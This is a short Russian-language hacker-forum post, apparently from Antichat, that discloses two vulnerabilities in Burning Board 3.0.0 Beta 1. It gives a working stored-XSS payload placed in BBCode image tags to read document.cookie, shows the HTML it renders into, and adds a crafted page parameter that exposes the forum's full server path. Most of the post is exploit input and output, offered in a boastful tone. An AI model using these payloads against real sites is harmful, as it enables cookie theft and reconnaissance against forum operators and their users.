Форум АНТИЧАТ - Burning Board 3.0.0 Beta 1

Вот что я надыбал в Burning Board 3.0.0 Beta 1

1. Активная XSS прямо в сообщении

Код:

[img]javascript:alert(document.cookie)[/img]

заменяеться на

Код:

<img src="java&*#115;cript:alert(document.cookie)" class="resizeImage" alt="" />

и куки у нас в алерте :)

2. Раскрытие пути

При подстановке неверного значения в переменную $_GET["page"] выдаеться сообщение об ошибке

Код:

index.php?page=Bugaga

Можно узнать полный путь к форуму